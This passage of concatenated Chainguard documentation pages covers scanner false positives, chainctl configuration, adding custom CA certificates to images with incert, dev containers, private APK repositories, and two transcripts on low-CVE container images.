vulnerability management process. Chainguard Containers, built on the Wolfi un-distro, can help you reduce your CVE count dramatically by keeping things minimal. By bundling only what is necessary to run the image, Chainguard Containers are hardened and lightweight in comparison to their counterparts. To learn more about how Chainguard Containers can help you achieve low (or zero!) CVEs in your containers, check out our documentation. Updating and Rebuilding Images Updating your container images to utilize recent stable package releases can help reduce the number of vulnerabilities found in your images. Research from Chainguard Labs has shown that popular container images accumulate about one CVE per day when not updated. In many cases, updating packages and rebuilding your images to incorporate them can readily resolve numerous vulnerabilities with released fixes. This may resolve false positive vulnerabilities outside of your program scope, allowing you to focus on the true positives which still remain. Learn More With false results mixed into your scans, triaging and addressing true positive vulnerabilities can quickly become a time-consuming task. Taking steps to adjust your scanner can help reduce the deluge of false positives and negatives clouding your scans, bringing you closer to securing your software. In this article, you learned how false results from your vulnerability scanners can occur, and how they can impact your development workflow. Additionally, you explored various ways you can improve the accuracy of your scanner through the application of tools like VEX, rebuilding your images, and choosing a base image suitable for your applications. To learn more about reducing false positives and negatives in your images, you can check out our collection of articles on SBOMs and VEX, read about selecting a base image for your applications, or discover how Chainguard Containers can help you reach zero CVEs in your containers. --- ### Manage Your chainctl Configuration URL: https://edu.chainguard.dev/chainguard/chainctl-usage/manage-chainctl-config/ Last Modified: December 12, 2024 Tags: chainctl, Product The Chainguard command line interface (CLI) tool, chainctl, will help you interact with the account model that Chainguard provides, and enable you to make queries into what’s available to you on the Chainguard platform. chainctl config CLI chainctl has a local configuration you can manage. To get a list of all options available, you can run: chainctl config -h You’ll receive output like the following: Local config file commands for chainctl. Usage: chainctl config [command] Available Commands: edit Edit the current chainctl config file. reset Remove local chainctl config files and restore defaults. save Save the current chainctl config to a config file. set Set an individual configuration value property. unset Unset a configuration property and return it to default. validate Run diagnostics on local config. view View the current chainctl config. Flags: -h, --help help for config Global Flags: --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") -o, --output string Output format. One of: ["", "json", "id", "table", "terse", "tree", "wide"] -v, --v int Set the log verbosity level. Use "chainctl config [command] --help" for more information about a command. To view your current chainctl config, run: chainctl config view You’ll receive output similar to this: # Base Config file: /home/erika/.config/chainctl/config.yaml auth: mode: browser device-flow: "" default: active-within: 24h0m0s autoclose: true autoclose-timeout: "10" group: "" identity-provider: "" org-name: "" skip-auto-login: false skip-version-check: false social-login: google-oauth2 use-refresh-token: true output: color: fail: '#ff0000' pass: '#00ff00' warn: '#ffa500' silent: false platform: api: https://console-api.enforce.dev audience: https://console-api.enforce.dev console: https://console.enforce.dev issuer: https://issuer.enforce.dev registry: https://cgr.dev The full documentation for the chainctl config command is available on the relevant reference page. Edit the chainctl Configuration You can edit the chainctl config directly with an editor. The following command will open your default command line text editor (typically nano) where you can edit the local chainctl config. chainctl config edit Alternatively, you can update one attribute at a time with the set option, as demonstrated in the next command: chainctl config set platform.api=https://console-api.enforce.dev You can review the chainctl config set options on the relevant docs page. Reset the Configuration If you run into issues with your chainctl configuration, you can use the following command to reset it to the default state: chainctl config reset You can review all the available chainctl commands in our chainctl reference documentation. --- ### How To Use incert to Create Container Images with Built-in Custom Certificates URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/incert-custom-certs/ Last Modified: July 8, 2023 Tags: Chainguard Containers, Product In many enterprise settings, an organization will have its own certificate authority which it uses to issue certificates for its internal services. This is often for security or control reasons but could also be related to regulatory requirements. If you’re using a container that needs to communicate with your organization’s services and your organization has its own certificate authority, you’ll need to add a valid certificate into your container. One way to do this is to mount the certificate as a volume at runtime. This works, but it means that everyone who uses the container has to go through the process of mounting the certificate. Another solution is to build the certificate directly into the container. This tutorial outlines how to use incert — a Go tool from Chainguard that builds container images with certificates inserted into them. Prerequisites To follow along with this tutorial, you will need to have the following tools installed. incert, a Go program that appends CA certificates to Docker images and pushes the modified image to a specified registry. You can install this by following the instructions listed in the project’s GitHub repository. Docker, the open-source containerization platform. Set this up by following the platform-specific instructions on the project’s website. A tool for creating a self-signed certificate. This guide highlights using cfssl, a public key infrastructure toolkit from CloudFlare, but alternatives like openssl could also be used for this purpose. Follow the cfssl installation instructions to set this up. Note that if you use cfssl, you will also need the cfssljson utility installed as well. Creating a self-signed certificate First, let’s create a directory to hold your certificate infrastructure. mkdir ~/incert-example/ && cd $_ In the new directory, create a certificate signing request (CSR) by running the following command. cat > csr.json <<EOF { "hosts": [ "example.com", "www.example.com" ], "CN": "www.example.com", "key": { "algo": "rsa", "size": 2048 }, "names": [{ "C": "US", "L": "San Francisco", "O": "Example Company, LLC", "OU": "Operations", "ST": "California" }] } EOF We want to create some certificates for example.com and www.example.com, so we include these here in a list for the CSR’s hosts value. This means the certificates will only be valid for these domains. Next, create your certificates by running the following cfssl selfsign command. cfssl selfsign www.example.com csr.json | cfssljson -bare selfsigned Here we include the hostname we specified previously (www.example.com) as well as the CSR file. We then pipe the command’s output into a cfssljson command; this will process the .json files output by the cfssl selfsign command into the .pem files we need. This command will return a warning that self-signed certificates are insecure. This is the expected behavior for cfssl, and since we are only using these certificates to demonstrate how incert works there won’t be any security concerns. . . . *** WARNING *** Self-signed certificates are dangerous. Use this self-signed certificate at your own risk. It is strongly recommended that these certificates NOT be used in production. *** WARNING *** Following that, if you check the contents of your working directory you will find the self-signed CSR, the key, and the certificate. ls csr.json selfsigned.csr selfsigned-key.pem selfsigned.pem With these files in place you can move on to creating an nginx container that uses these certificates to provide TLS. Create an nginx container that uses self-signed certificates for TLS Now that you’ve created the certificate infrastructure, you can create an nginx container that uses them to provide TLS. Later on, we will attempt to reach this nginx container with a curl container we built using incert, testing that incert correctly installed the selfsigned.pem certificate into it. First run the following command to create an nginx configuration file named nginx.default.conf. This example is a fairly barebones configuration but will be adequate for the purposes of this guide. Note that it specifies the server should listen on port 8443 and will serve requests for example.com and www.example.com. It also specifies the location of the certificate and key to be used by the container, namely the /etc/nginx/conf.d/ directory. cat > nginx.default.conf <<EOF server { listen 8443 ssl; server_name example.com www.example.com; ssl_certificate /etc/nginx/conf.d/cert.pem; ssl_certificate_key /etc/nginx/conf.d/key.pem; location / { root /usr/share/nginx/html; index index.html index.htm; } error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } } EOF Then run the following command to create the nginx container. This command uses Chainguard’s public nginx image and mounts the cert.pem, key.pem, and nginx.default.conf files we’ve created into the /etc/nginx/conf.d directory within the container. It also includes the -p option, allowing you to forward requests on your host’s port 8443 to the container’s port 8443. docker run -p 8443:8443 -d \ -v ./nginx.default.conf:/etc/nginx/conf.d/nginx.default.conf \ -v ./selfsigned.pem:/etc/nginx/conf.d/cert.pem \ -v ./selfsigned-key.pem:/etc/nginx/conf.d/key.pem \ cgr.dev/chainguard/nginx Note: You may encounter permissions errors relating to the selfsigned.pem and selfsigned-key.pem files after running this command. In these cases, you can update their permissions by running sudo chmod 644 *.pem. Test connections to the nginx service with curl At this point, if you tried to use curl to access the running nginx container, the command will fail because curl disallows insecure connections by default. curl https://localhost:8443 curl: (60) SSL certificate problem: self-signed certificate More details here: https://curl.se/docs/sslcerts.html curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above. You can force curl to ignore the self-signed certificate by passing it the -k argument, as in curl -k https://localhost:8443. However, our goal is to connect to the service securely using the certificate infrastructure created previously. In the next section we will use incert to create a new container image (using Chainguard’s curl image as the foundation) with your selfsigned.pem certificate built into it. Before doing this, though, let’s attempt to reach the nginx service with a curl container that does not have the certificate included. To do this you’ll need to find the nginx container’s IP address. First, find the name of the container with docker ps. docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 9e211033635b cgr.dev/chainguard/nginx "/usr/sbin/nginx -c …" 2 minutes ago Up 2 minutes 0.0.0.0:8443->8443/tcp, :::8443->8443/tcp agitated_jones As this output shows, the name of the nginx container in this example is agitated_jones. Replace this with the name of your own container in the following command: docker inspect --format '{{ .NetworkSettings.IPAddress }}' agitated_jones This will return the container’s IP address: 172.17.0.2 Next, use Chainguard’s curl image to attempt to reach the container. Be sure to replace 172.17.0.2 with your nginx container’s actual IP address, if different. docker run -it --add-host example.com:172.17.0.2 cgr.dev/chainguard/curl:latest-dev https://example.com:8443 Note: You might have noticed that example.com is a real website. Instead of using the curl container to reach the actual example.com, this command includes the --add-host option to map the hostname example.com to the local IP address currently being used by the nginx container. However, the public Chainguard curl image doesn’t have the certificate inside it, so this command will fail. curl: (60) rustls_connection_process_new_packets: invalid peer certificate: UnknownIssuer More details here: https://curl.se/docs/sslcerts.html curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above. The next step is to create an image that has our self-signed certificate built into it. For that, we’ll use incert. Using incert to insert a custom certificate into an image incert is a Go program from Chainguard that appends CA certificates to Docker images and pushes the modified image to a specified registry. This tool is still in active development, so feedback is welcome. Run the following command to build a new image using Chainguard’s curl image as its base and insert the selfsigned.pem certificate into it. incert -ca-certs-file selfsigned.pem -platform linux/arm64 -image-url cgr.dev/chainguard/curl:latest -dest-image-url ttl.sh/curl-with-cert:1h This command uses the -ca-certs-file option to specify that incert should use the selfisgned.pem certificate file and the -platform option to specify that it wants to build an image for linux/arm64. Be aware that you should change the value passed to the -platform argument to reflect that of the host platform. It also includes the -image-url option to specify the image we want to build on as our base image (here we specify Chainguard’s curl image) and the -dest-image-url to pass the registry where we want the resulting image to be uploaded to. For this final option, this example specifies ttl.sh, an ephemeral Docker image registry. ttl.sh is free to use and does not require a login, making it useful for testing. However, it’s also public, so be sure that you do not upload any important private certificates there. This command will take a few moments to complete, but once it finishes you will receive output showing the image that was created and uploaded to the destination repo. ttl.sh/curl-with-cert:1h@sha256:877762fdd511a3df8aa24faf6a6209036370b7cfc1638e16b81098143c2a0215 Following that, you can re-execute the docker run command from the previous section, but replace the standard Chainguard curl image with the image you just built. docker run -it --add-host example.com:[ipaddress] ttl.sh/curl-with-cert:1h https://example.com:8443 This time, the curl container is able to reach the running nginx container. . . . <!DOCTYPE html> <html> <head> <title>Welcome to nginx!</title> <style> html { color-scheme: light dark; } body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body> <h1>Welcome to nginx!</h1> <p>If you see this page, the nginx web server is successfully installed and working. Further configuration is required.</p> <p>For online documentation and support please refer to <a href="http://nginx.org/">nginx.org</a>.<br/> Commercial support is available at <a href="http://nginx.com/">nginx.com</a>.</p> <p><em>Thank you for using nginx.</em></p> </body> </html> This shows that incert built the certificate into the curl container as expected and it was able to reach the nginx container. Learn more If you’d like to learn more about how you can use Chainguard Containers effectively, we encourage you to check out all of our resources on Working with Chainguard Containers. Additionally, our Recommended Practices resources can be useful for ensuring the security of your container images. --- ### Using Chainguard Containers in Dev Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/dev-containers/ Last Modified: March 8, 2025 Tags: Chainguard Containers, Product Development Containers — sometimes known as “dev containers” — allow you to use a container as a development environment where you can run applications and separate tools, libraries, or runtimes. Dev containers can also help with testing and continuous integration. With a few changes, the images based on Wolfi and maintained by Chainguard provide distroless images that can be used as dev containers. This guide outlines how you can set up a Chainguard image as a dev container in VS Code. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Prerequisites To follow along with this guide, you will need to have the following: A compatible Integrated Development Environment (IDE) or other tool. Here is a list of supported editors and tools. Note that this guide was validated using Visual Studio Code (VS Code). A Docker server to connect to. A local installation of Docker Desktop will usually suffice for demonstration purposes, but you can find full instructions in this guide on Developing inside a Container in the VS Code documentation. This guide’s first example assumes that you have a GitHub repository named empty. You can follow GitHub’s Quickstart for repositories for information on setting this up. What are Dev Containers? A development container is a container in which a user can develop an application. Development containers are isolated environments that allow developers to work on applications with all the necessary dependencies, tools, and configurations pre-packaged. These containers ensure that the development environment is consistent across different systems, avoiding the “works on my machine” problem. In order to run a dev container, the given project must contain a file named devcontainer.json. This is a special file defined by the Development Container Specification which holds all the metadata necessary to configure the dev container. Although there are many reasons why production images should be secure, the reasons for concern about the security of development environments are less clear. Put briefly: the code you’ve written and tested in your development environment will eventually make it into your production environment. If you’ve been hacked during development, then perhaps the hackers’ code goes into production as well. Chainguard offers minimal runtime images designed for running production workloads, and development images that contain a shell and some development tooling. With that said, both development and production images are slimmed down and updated regularly to be free of CVEs. Because of their minimal and secure-by-default nature, Chainguard Containers are ideal for use in a secure development process. Building a Go Dev Container using an Example Repository The following is an example of how to set up a dev container using a Go project. Here, we will take the content of the chainguard-go-devcontainer directory in Chainguard’s demo GitHub repository and push it to the root of an empty repository. Start by cloning the repository: git clone https://github.com/chainguard-dev/edu-images-demos.git Then navigate into the chainguard-go-devcontainer example directory: cd edu-images-demos/chainguard-go-devcontainer From there, Initialize a Git repository: git init . Then add all the files there, including any hidden files: git add * .??* Commit the changes: git commit -am "Initial Commit" Add a GitHub repository that you have control over as a remote named origin. This example assumes that the repository is named empty but you can use any empty GitHub repository you have created: git remote add origin https://github.com/$YOUR-GITHUB-PROFILE/empty.git Be sure to change $YOUR-GITHUB-PROFILE to reflect the name of your GitHub profile. Finally, push the commit to the remote repository you just configured: git push -fu origin main Following that, if you open VS Code on this directory you will be prompted to open the project in a dev container. If you do reopen the project in a dev container it may take a minute or so to build the first time you use it. Open a terminal and you can run the sample project, even if you don’t have Go installed on your local machine: If you run a webserver in your dev container you will be asked if you want to open the port in a local browser. Exactly as if you were running in a local container: Building a Dev Container in other languages If you want to develop in languages other than Go, you’ll need to use a different base image. Note that to do this, you’ll need a working knowledge of Dockerfiles, Docker builds, JSON, as well as how your chosen language installs libraries or packages. There are a couple of different ways to set this up, and the exact configuration used in the following example is not strictly required as long as certain requirements are met. This example sets up a Python project and uses a Dockerfile and devcontainer.json in a .devcontainer directory. This has the advantage of keeping the code separate from the dev container configuration. Assuming you’re starting from a project with no dev container, you’ll first need to create the requisite files and folders. Start by creating a directory named .devcontainer and navigate into it: mkdir .devcontainer && cd $_ Next, create a dev container configuration file named devcontainer.json with the following command: cat > devcontainer.json <<EOF { "name": "my-devcontainer", "build": { "dockerfile": "Dockerfile", "args": {} }, "customizations": { "vscode": { "extensions": [ "ms-python.python" ] } }, "postCreateCommand": "pip install -r requirements.txt", "remoteUser": "nonroot" } EOF Because this is for a Python app, we are installing the VS Code python extension and using pip to install project dependencies. The postCreateCommand runs in the root of your project after it has been cloned into the container. If you don’t have a requirements.txt file with your project the command will fail and you will need to remove the command to use the dev container. Following that, you’ll need to find a base image. Chainguard offers a wide range of images for different languages and ecosystems. To search, use the images directory. For this example, Chainguard’s Python image will suffice. Create a Dockerfile with the following command: cat > Dockerfile <<EOF FROM chainguard/python:latest-dev USER root RUN apk update && apk add posix-libc-utils && ldconfig USER nonroot RUN pip install pylance debugpy EOF Here’s what each line of this Dockerfile does: FROM: Many Chainguard images are available at Docker Hub, meaning you can set the FROM line in the Dockerfile like this example. Alternatively, you could set this with cgr.dev/chainguard/python or, if your Chainguard organization has access to a Production Python image, cgr.dev/$ORGANIZATION/python:$TAG. USER root: Including this line forces the next commands to run as root instead of the unprivileged user. Whether you need to include this line or not will depend on what image you’re using. You can check by running your image locally and using the id command. The following example shows that the Python image uses the nonroot user by default while the Go image uses root by default: docker run -it --entrypoint id chainguard/python:latest-dev uid=65532(nonroot) gid=65532(nonroot) groups=65532(nonroot) docker run -it --entrypoint id chainguard/go:latest-dev uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) RUN apk update …: This line installs the POSIX utilities (from which dev containers can use the getent command) and then updates the library links with ldconfig. ldconfig and getent are needed to allow the container start scripts from VS Code to run, though they may already be included in some base images. If your language needs any other packages that must be installed by the root user, now is the time to add them. USER nonroot: This continues the Dockerfile as the unprivileged user to install any other packages the language or VSCode extension might need. RUN pip install pylance debugpy: Finally, this line installs the pylance and debugpy packages — both used by the Python plugin — with pip. This is more for illustration purposes; you don’t have to install them now, since the plugin can install them later. Do not install packages your project needs here. The image build happens before the source code is cloned. So you’d need to somehow duplicate listing your dependencies into this file as well as wherever they are already listed. Instead, use the postCreateCommand. If you save those 2 files into an existing Python repository you will be able to reopen the project in a dev container. Customizing the image You can further customize the Dockerfile, but in some cases you may need to run commands as root. Chainguard’s minimal, distroless images do not include sudo and there is no root password to use. To add sudo, you can add the following line to the Dockerfile in the section running as the root user: RUN apk add sudo-rs shadow && echo "nonroot ALL = (ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers && echo y | pwck -q || trueUsage Notes GitHub CodeSpaces support dev containers. However, at present they only work when the config is stored at the root directory. The IDE should pass your keys through to the dev container using ssh-agent and gpg-agent. For this reason, you may need to install GPG or SSH tools inside the container. Please refer to the VS Code page on advanced usage for more information. Conclusion You should now have a development environment that does not require packages to be installed on your local machine and will run the same for anyone working on your project. You may want to add things like linting rules or other components to your dev container config. The VS Code website has many resources on working with dev containers which you may find useful. --- ### Chainguard's Private APK Repositories URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/private-apk-repos/ Last Modified: February 21, 2025 Tags: Chainguard Containers, Product With Chainguard’s Private APK Repositories, you can access packages that are included within your organization’s container image entitlements. This allows you to build custom images based on components that are already part of your organization catalog. This guide provides a brief overview of Chainguard’s private APK repositories and outlines different ways you can incorporate them into your organization’s workflows. NOTE: Chainguard’s private APK repositories feature is currently in the beta phase and it will likely go through changes before becoming generally available. About Private APK Repositories Chainguard’s private APK repos allow customers to pull secure apk packages from Chainguard. The list of packages available in an organization’s private repository is based on the apk repositories that the organization already has access to. For example, say your organization has access to the Chainguard MySQL container image. Along with mysql, this image comes with other apk packages, including bash, openssl, and pwgen. This means that you’ll have access to these apk packages through your organization’s private APK repository, along with any others that appear in Chainguard container images that your organization has access to. Chainguard’s private APK repositories are available to all Chainguard Containers customers. Your Repository Address Your private APK repository will be available at a URL like the following: https://apk.cgr.dev/$ORGANIZATION You will need to replace $ORGANIZATION with the name of your organization as it appears in the Chainguard Console. You can always find your private APK repository’s address by logging into the Chainguard Console and navigating to the Settings tab in the left-hand navigation menu. This will take you the General section where you can copy the repository address: In order to use your private repository, you must add this URL to the list of apk repositories found in an /etc/apk/repositories file, and you’ll also need to provide credentials to have access to this repo. To set this up, you must follow these general steps: Set up an HTTP_AUTH environment variable with appropriate credentials Add https://apk.cgr.dev/ORGANIZATION to /etc/apk/repositories Update your apk cache Install your desired packages In the following sections, this guide will outline how to implement this process in a live container and also when building container images from a Dockerfile or using apko. Authenticating to your Private APK Repository To access the apk packages in your private repository, you’ll first need to authenticate. You can do so by setting up an HTTP_AUTH environment variable with an authentication string that uses chainctl to obtain an ephemeral token to access the registry. The HTTP_AUTH environment variable expects a string in the following format: HTTP_AUTH=basic:apk.cgr.dev:user:password You will need to replace password with an apk token which you can obtain using the following chainctl command: chainctl auth token --audience apk.cgr.dev The following docker run command injects the HTTP_AUTH environment variable directly into the container by calling chainctl from the host machine: docker run -ti --rm \ -e "HTTP_AUTH=basic:apk.cgr.dev:user:$(chainctl auth token --audience apk.cgr.dev)" \ cgr.dev/$ORGANIZATION/$IMAGE In this command and throughout the rest of this guide, be sure to change $ORGANIZATION to reflect the name of your organization’s repository within Chainguard’s registry. Additionally, this guide was validated using the chainguard-base image, but you can use any container image that is part of your organization’s image catalog. However, to follow along with every example this guide, you should use a container image that includes a shell, such as an image’s -dev variant. Also, you can initialize these placeholder values by setting them as environment variables as in the following examples. This will make it easier to follow along: ORGANIZATION="chainguard.edu" IMAGE="chainguard-base" This command will start an interactive container and open up a shell interface. From there, you can add your organization’s private APK repository to the list of apk repositories in /etc/apk/repositories. First, you’ll need to retrieve your organization’s private repository address. Recall that you can find this in the Settings tab in the Chainguard Console. From the interactive container’s shell, add the repository address to your list of apk repositories with a command like the following: echo https://apk.cgr.dev/$ORGANIZATION > /etc/apk/repositories Note that this command uses > to overwrite the contents of the /etc/apk/repositories file. You could instead append the private APK repository’s address with >>, but here we overwrite the file to ensure that we’re only installing packages from the private repo. Then update the apk cache to include the newly-added private repository: apk update Following that, you can proceed to search and install packages from your private APK repository. Searching for and Installing Packages As an example of how you can search for and install packages from these private repositories, this section will install wget. However, you could also try this out with any apk package that is included in any of the Chainguard container images your organization has access to. First, search for the wget package from the interactive container’s shell: apk search wget You will receive output similar to the following: wget-1.25.0-r0 You can call apk policy to find which repositories contains the package: apk policy wget This example output shows that it’s available from the private APK repository: wget policy: wget policy: 1.24.5-r4: https://apk.cgr.dev/$ORGANIZATION 1.24.5-r5: https://apk.cgr.dev/$ORGANIZATION 1.25.0-r0: https://apk.cgr.dev/$ORGANIZATION Install the package with apk add: apk add wget Finally,run the same apk policy command you ran previously: apk policy wget wget policy: 1.24.5-r4: https://apk.cgr.dev/$ORGANIZATION 1.24.5-r5: https://apk.cgr.dev/$ORGANIZATION 1.25.0-r0: lib/apk/db/installed https://apk.cgr.dev/$ORGANIZATION This output shows that the wget package is now installed. Using Private APK Repositories with Dockerfiles So far, this guide has outlined how to manually fetch apk packages from a private repository. We’ll now go over how to use a private APK repo within a Dockerfile workflow. We’ll be using the same organization, container image, and private package used in the previous examples. If you haven’t already done so, close the container you were running in the previous section. Then run the following command to create a Dockerfile. This Dockerfile uses Docker Build Secrets to inject the credentials into a RUN command that will update the apk cache and another that will install the wget apk package: cat > Dockerfile <<EOF FROM cgr.dev/$ORGANIZATION/$IMAGE USER root RUN echo https://apk.cgr.dev/$ORGANIZATION > /etc/apk/repositories RUN --mount=type=secret,id=cgr-token sh -c "export HTTP_AUTH=basic:apk.cgr.dev:user:\$(cat /run/secrets/cgr-token) apk update && apk add wget" USER nonroot EOF Again, this Dockerfile overwrites the contents of the /etc/apk/repositories file. This isn’t necessary, but will force Docker to build the image and install the wget package without falling back to the default repositories. Now you can build the image while passing along credentials obtained with chainctl. The following example builds an image named my-custom-image: CGR_TOKEN=$(chainctl auth token --audience apk.cgr.dev) \ docker build --secret id=cgr-token,env=CGR_TOKEN . -t my-custom-image Following that, you can verify that the image has access to the private repository and contains the apk package that was installed at build time: docker run --rm my-custom-image apk policy wget wget policy: 1.24.5-r4: https://apk.cgr.dev/$ORGANIZATION 1.24.5-r5: https://apk.cgr.dev/$ORGANIZATION 1.25.0-r0: lib/apk/db/installed https://apk.cgr.dev/$ORGANIZATION As this output shows, the wget apk package is installed in the container. Using Private APK Repositories with Apko Builds You can also use your private APK repository with apko builds. One of the advantages of this method is that you can build distroless images that include only the apk packages you need in the final image. As with the previous examples, you’ll need to provide the HTTP_AUTH environment variable containing your Chainguard token to the apko runtime building the image. The following Dockerfile includes the private APK repository used in previous examples and installs a single package (wget) in the image: cat > apko.yaml <<EOF contents: repositories: - https://apk.cgr.dev/$ORGANIZATION packages: - wget archs: - x86_64 - aarch64 EOF The following docker run command will inject the HTTP_AUTH environment variable within an apko runtime and build the image: docker run --rm \ -e "HTTP_AUTH=basic:apk.cgr.dev:user:$(chainctl auth token --audience apk.cgr.dev)" \ --workdir /work -v ${PWD}:/work \ cgr.dev/chainguard/apko build apko.yaml test-apk test-apk.tar You’ll get output similar to the following, indicating that the wget package was installed using the private APK repo: 2025/02/20 21:23:48 INFO Building images for 1 architectures: [amd64] 2025/02/20 21:23:48 INFO setting apk repositories: [https://apk.cgr.dev/$ORGANIZATION] 2025/02/20 21:23:50 INFO installing ca-certificates-bundle (20241121-r1) 2025/02/20 21:23:50 INFO installing wolfi-baselayout (20230201-r16) 2025/02/20 21:23:50 INFO installing ld-linux (2.40-r8) 2025/02/20 21:23:50 INFO installing glibc (2.40-r8) 2025/02/20 21:23:50 INFO installing libgcc (14.2.0-r8) 2025/02/20 21:23:50 INFO installing glibc-locale-posix (2.40-r8) 2025/02/20 21:23:50 INFO installing libcrypto3 (3.4.1-r0) 2025/02/20 21:23:50 INFO installing libssl3 (3.4.1-r0) 2025/02/20 21:23:50 INFO installing wget (1.25.0-r0) 2025/02/20 21:23:50 INFO setting apk repositories: [https://apk.cgr.dev/$ORGANIZATION] 2025/02/20 21:23:50 INFO built image layer tarball as /tmp/apko-temp-2854430999/apko-x86_64.tar.gz . . . Troubleshooting You may receive a 403 error when pulling down a package: 403 FORBIDDEN caller does not have the required capabilities This error may mean that your Chainguard identity doesn’t have the proper capabilities to download the image. To pull an image, the identity will need a role with the apk (list) capability. The least privileged role with this capability is apk.role, though more privileged roles like owner, editor, and viewer also have this capability. You can check this and fix it by following these steps: Run chainctl auth status and check the Capabilities field in the output. If you don’t find the apk.pull role (or a more privileged role) for the organization you’re trying to pull from, you will need to add the role. Create the apk.pull role using the steps outlined in our Overview of Roles and Role-bindings resource. Try pulling the package again. As this feature is still in its beta phase, we invite feedback. If you would like to provide feedback or need further assistance troubleshooting, please reach out to our Customer Support team. Conclusion Private APK repositories offer customers a convenient way to make use of the packages their organization has access to. By following this guide, you should have a good understanding of how you can use them in your particular workflows. Be aware that you can use private APK repositories to install packages within container images customized with Chainguard’s Custom Assembly tool. Refer to our Custom Assembly documentation for more information. --- ### How Chainguard Creates Container Images with Low-to-No CVEs URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/zerocve/ Last Modified: March 21, 2025 Tags: Video, Chainguard Containers, Product Tools and resources used in this video Grype Wolfi Security Advisories Note: In November 2024, after this article was first written, Chainguard made changes to its free tier of container images. In order to access the non-free container images used in this guide, you will need to be part of an organization that has access to them. For a full list of container images that will remain in Chainguard's free tier, please refer to this support page. Transcript I sometimes get asked how Chainguard manages to create container images with zero CVEs. Sometimes people claim it’s a trick or that we’re cheating in some way. It’s absolutely not a trick and I’m going to explain in this video how we do it. Now the first thing to be aware of is that our container images work with majority of scanners and they will flag CVEs if they’re present in our container images. So just to prove this I’m going to scan an old container image. So this is the flux Chainguard container image and it’s from I think around three months ago. So in that time since it’s been published it’s accumulated CVEs and Grype will tell us that. So in, I think it’s around three months, it’s accumulated three medium and 75 unknown CVEs. So some of you are probably aware that there’s issues at the NVD with classification at the minute which is why there’s so many unknown CVEs which is a bit unfortunate. It is telling me that they’re fixed or 71 of them are fixed, meaning that if we update these APKs they will go away. But yeah so that’s an old container image with CVEs. If I compare it to the current container image, “latest”, I am hoping, yes, there’s zero CVEs. So hopefully this proves that scanners or Grype at least will report CVEs in Chainguard Containers. There are basically three things we do to address CVEs. One we keep our container images as small as possible. By reducing the amount of software in an container image to the absolute minimum required we reduce the amount of software there is to have a CVE in the first place. Less packages means less vulnerabilities. And we take this seriously. Our production container images don’t even have a shell or package manager by default. Two: we’re really aggressive about keeping our software up-to-date. So when an upstream project does a release we’ll grab that immediately and typically have a new Wolfi package ready in four hours and a new container image shortly after. And if there’s one piece of advice I would give teams to avoid issues it’s keep your software and dependencies up-to-date. It really is the best way to avoid getting hit by known vulnerabilities. It is a lot of work as things tend to break when you update things but it really is necessary work. Between them those two points handle most cases. But there is a third thing we do and it’s a bit more specific to us and that is we issue security advisories. Now a security advisory is basically a YAML file that gets picked up by scanners and provides them with more information on specific vulnerabilities. So if we go back and look at some of the CVEs reported by Grype we see some specific to flux up here. For example CVE-2024-24783 through to CVE-2024-24786. So what we can do is we can go to the advisory website on Wolfi for flux and see what it says about those CVEs. Okay so I’m on the advisories github project for wolfi-dev and we’re looking at the flux advisories. And what we see here is we’ve got an advisory for CVE-2023-39325 and what we’re saying is we fixed that CVE and it’s been fixed since package 2.1.2-r1. So we might have pulled in a patch or we might have updated a release etc. Got a very similar one here. I think this was Rapid Reset by the way. Here’s another interesting one. This time we’re saying this CVE-2023-45283 is a false positive because this vulnerability only affects windows and this is a Linux package. Same with this one and if we scroll down a bit we should get to, yeah, these are the CVEs that we saw in the output earlier and you can see when they’ve been fixed and which version they’ve been fixed in. Aliases, so the CVE also goes by the github security advisory with this code. And here we got an example of us picking up so we became aware that Grype had detected a vulnerability in one of our container images on the 14th of March and we fixed it on the 16th of March and this is the version that it was fixed in. This information is picked up by scanners and used to filter out the results so they’re more accurate. Okay so that’s about it. To recap the three things we do are one keep our container images small, two keep our packages up-to-date and three when we have to we issue security advisories. Hope that was helpful please let me know if you have any questions. --- ### Using the Chainguard Static Base Container Image URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/static-base-image/ Last Modified: August 30, 2023 Tags: Chainguard Containers, Product, Video Tools used in this video Docker Grype Dockerfile FROMcgr.dev/chainguard/go AS buildCOPY main.go /main.goRUN CGO_ENABLED=0 go build -o /hello /main.goFROMcgr.dev/chainguard/staticCOPY --from=build /hello /usr/local/bin/CMD ["hello"]Transcript So what’s the best container base image to use? 0:10 Well, there’s plenty of choices but if everything else is equal, I would choose something very small and with a low known-vulnerability account, and an excellent example of this is a Chainguard static image. 0:25 So some of you are probably familiar with the Google Distroless images and the Chainguard static image is very similar. 0:33 So as some background, these images all came from a quest to produce the most minimal secure container images possible. 0:42 The idea is that the less there is in a container image, it’s not just easier to transfer, but it’s also less complex and more secure. 0:52 And this is borne out by just comparing common base images and the sizes and CVE count. 0:58 For example, let’s take a look at the Debian image 1:01 And we can see that’s around 140 megabytes in size. 1:08 We can compare that to Alpine. 1:11 And Alpine is only 7.6 megabytes. 1:15 And then if we look at the Google distroless image 